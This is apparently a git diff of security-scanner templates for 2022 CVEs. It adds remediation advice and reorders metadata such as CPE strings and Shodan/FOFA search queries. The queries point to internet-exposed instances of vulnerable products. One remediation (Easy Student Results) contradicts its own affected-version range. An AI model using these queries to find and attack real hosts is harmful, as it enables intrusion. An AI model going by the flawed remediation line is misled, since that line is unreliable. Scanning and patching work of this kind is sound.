b/http/cves/2022/CVE-2022-2314.yaml index cd4a0a5508..296bcc3d26 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82 - https://wordpress.org/plugins/vr-calendar-sync/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2314 cwe-id: CWE-94 epss-score: 0.1914 - cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95605 + cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: vr_calendar_project product: vr_calendar + framework: wordpress tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan http: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index bd8f5a768e..b196ae35df 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields. + remediation: | + Update the Crestron Device firmware to the latest version to mitigate the vulnerability. reference: - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device - https://nvd.nist.gov/vuln/detail/CVE-2022-23178 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 - cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* epss-percentile: 0.89951 + cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 vendor: crestron diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index a505be7c3f..83cdd176d5 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: BigAnt Server v5.6.06 is vulnerable to local file inclusion. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06. reference: - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347 - https://nvd.nist.gov/vuln/detail/CVE-2022-23347 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-23347 cwe-id: CWE-22 epss-score: 0.10291 - cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* epss-percentile: 0.94201 + cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"BigAnt" verified: true + max-request: 1 vendor: bigantsoft product: bigant_server + shodan-query: http.html:"BigAnt" tags: cve,cve2022,bigant,lfi http: diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index c0d3cf0af8..370f1de15c 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the access control issue. reference: - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348 - http://bigant.com @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-23348 cwe-id: CWE-916 epss-score: 0.00323 - cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* epss-percentile: 0.66903 + cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"bigant" verified: true + max-request: 1 vendor: bigantsoft product: bigant_server + shodan-query: http.html:"bigant" tags: cve,cve2022,bigant,unauth,exposure http: diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 32e3a7a2bf..1709e05715 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. + remediation: | + Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544 - https://nvd.nist.gov/vuln/detail/CVE-2022-23544 @@ -17,15 +19,15 @@ info: cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 epss-score: 0.00059 - cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* epss-percentile: 0.22776 + cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: html:"metersphere" - fofa-query: title="MeterSphere" + max-request: 1 vendor: metersphere product: metersphere + shodan-query: html:"metersphere" + fofa-query: title="MeterSphere" tags: cve,cve2022,metersphere,ssrf,oast http: diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index 1aa6d765ac..cae9b857de 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. + remediation: | + Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2373 cwe-id: CWE-862 epss-score: 0.00401 - cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* epss-percentile: 0.70313 + cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: nsqua product: simply_schedule_appointments + framework: wordpress tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp http: diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index d8cd3cf95a..95afd1f267 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -5,24 +5,24 @@ info: author: Random-Robbie severity: medium description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. + remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376 - https://nvd.nist.gov/vuln/detail/CVE-2022-2376 - remediation: Fixed in version 7.3.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 epss-score: 0.0701 - cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93088 + cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpwax product: directorist + framework: wordpress tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure http: diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 6f8ce39e83..c3f6073e16 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + remediation: | + Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability. reference: - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html - https://github.com/fbusr/CVE-2022-23779 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-23779 cwe-id: CWE-200 epss-score: 0.0089 - cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* epss-percentile: 0.80566 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="ZOHO-ManageEngine-Desktop" vendor: zohocorp product: manageengine_desktop_central + fofa-query: app="ZOHO-ManageEngine-Desktop" tags: cve,cve2022,zoho,exposure http: diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 6009cad5bd..b39a068ea8 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number. + remediation: | + Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability. reference: - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 - https://wordpress.org/plugins/easy-student-results/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2379 cwe-id: CWE-862 epss-score: 0.02717 - cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89157 + cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: easy_student_results_project product: easy_student_results + framework: wordpress tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index c91a8c0d4f..808bd3a1a3 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -5,6 +5,8 @@ info: author: cckuailong,daffainfo severity: medium description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + remediation: | + Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. reference: - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A - https://github.com/dipakpanchal456/CVE-2022-23808 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-23808 cwe-id: CWE-79 epss-score: 0.00238 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* epss-percentile: 0.6117 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.component:"phpmyadmin" + max-request: 2 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.component:"phpmyadmin" tags: cve,cve2022,phpmyadmin,xss http: diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index b312693833..fe241269dd 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page. + remediation: | + Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 - https://wordpress.org/plugins/feed-them-social/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2383 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: slickremix product: feed_them_social + framework: wordpress tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss http: diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 291958317b..9e726dec67 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -6,6 +6,8 @@ info: severity: high description: | AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion. + remediation: | + Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/cve/CVE-2022-23854 - https://www.aveva.com @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-23854 cwe-id: CWE-22,CWE-23 epss-score: 0.88121 - cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* epss-percentile: 0.98247 + cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"InTouch Access Anywhere" verified: true + max-request: 1 vendor: aveva product: intouch_access_anywhere + shodan-query: http.html:"InTouch Access Anywhere" tags: lfi,packetstorm,cve,cve2022,aveva,intouch http: diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index b57fa95fb5..32f58f778b 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + remediation: | + Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. reference: - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - http://www.zzzcms.com @@ -15,8 +17,8 @@ info: cve-id: CVE-2022-23881 cwe-id: CWE-77 epss-score: 0.29422 - cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* epss-percentile: 0.96308 + cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zzzcms diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index cdf30a7a36..0b6a1d6af4 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5. reference: - https://github.com/ming-soft/MCMS/issues/62 - https://github.com/advisories/GHSA-p94q-9q2m-pfh2 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-23898 cwe-id: CWE-89 epss-score: 0.01029 - cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* epss-percentile: 0.81996 + cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: icon_hash="1464851260" - shodan-query: http.favicon.hash:1464851260 verified: true + max-request: 1 vendor: mingsoft product: mcms + shodan-query: http.favicon.hash:1464851260 + fofa-query: icon_hash="1464851260" tags: cve,cve2022,sqli,mcms variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index 2ebf60cd06..0cc39f59aa 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -5,21 +5,21 @@ info: author: cckuakilong severity: critical description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y - http://www.openwall.com/lists/oss-security/2022/01/25/15 - remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2022-23944 cwe-id: CWE-306,CWE-862 epss-score: 0.65738 - cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* epss-percentile: 0.97456 + cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 809d3c46d0..9ff9a9f865 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -5,27 +5,27 @@ info: author: Mr-xn severity: critical description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). reference: - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - http://www.openwall.com/lists/oss-security/2022/02/11/3 - remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 epss-score: 0.97343 - cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* epss-percentile: 0.99829 + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 - fofa-query: title="Apache APISIX Dashboard" + vendor: apache product: apisix shodan-query: title:"Apache APISIX Dashboard" - vendor: apache + fofa-query: title="Apache APISIX Dashboard" tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive http: diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 7f829b17d2..8e8b600d83 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + remediation: | + Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability. reference: - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html - https://www.exploit-db.com/exploits/50792 @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-24124 cwe-id: CWE-89 epss-score: 0.00846 - cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* epss-percentile: 0.80026 + cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: casbin product: "casdoor" shodan-query: http.title:"Casdoor" - vendor: casbin tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor http: diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index e14fdb0ce6..1cb0fc4801 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services. + remediation: | + Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability. reference: - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-24129 cwe-id: CWE-918 epss-score: 0.00647 - cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* epss-percentile: 0.76687 + cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* metadata: max-request: 1 - framework: identity_provider vendor: shibboleth product: oidc_op + framework: identity_provider tags: cve,cve2022,ssrf,oidc,shibboleth http: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index e7f38a8fc1..3076575232 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + remediation: | + Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-2414 cwe-id: CWE-611 epss-score: 0.01359 - cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* epss-percentile: 0.84532 + cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: title="Identity Management" - shodan-query: title:"Identity Management" html:"FreeIPA" verified: true + max-request: 1 vendor: dogtagpki product: dogtagpki + shodan-query: title:"Identity Management" html:"FreeIPA" + fofa-query: title="Identity Management" tags: cve,cve2022,dogtag,freeipa,xxe http: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 2318a4e7f4..6f5a3c0647 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. + remediation: | + Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/50881 - https://github.com/pkp/pkp-lib/issues/7649 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-24181 cwe-id: CWE-79 epss-score: 0.00131 - cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* epss-percentile: 0.47237 + cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: public_knowledge_project product: open_journal_systems tags: cve,cve2022,xss,oss,pkp-lib,edb diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 3f3f8d0a16..829db2e4bf 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -6,22 +6,22 @@ info: severity: critical description: | AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php. + remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html - https://github.com/thedigicraft/Atom.CMS/issues/255 - https://nvd.nist.gov/vuln/detail/CVE-2022-24223 - remediation: Fixed in version Atom CMS v2.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24223 cwe-id: CWE-89 epss-score: 0.00656 - cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* epss-percentile: 0.7689 + cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: thedigitalcraft product: atomcms tags: packetstorm,cve,cve2022,sqli,atom,cms diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index fdbb196e8e..9d735a922c 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application. reference: - https://kerbit.io/research/read/blog/3 - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-24260 cwe-id: CWE-89 epss-score: 0.39803 - cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* epss-percentile: 0.96763 + cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"VoIPmonitor" vendor: voipmonitor product: voipmonitor + shodan-query: http.title:"VoIPmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth http: diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index e35945731a..15a54ebdee 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24264 @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-24264 cwe-id: CWE-89 epss-score: 0.06436 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.9277 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cuppacms product: cuppacms tags: cve,cve2022,sqli,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 7cdc8fe80b..6346c2428a 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24265 @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-24265 cwe-id: CWE-89 epss-score: 0.06436 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.9277 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cuppacms product: cuppacms tags: cve,cve2022,sqli,cuppa,authenticated diff --git 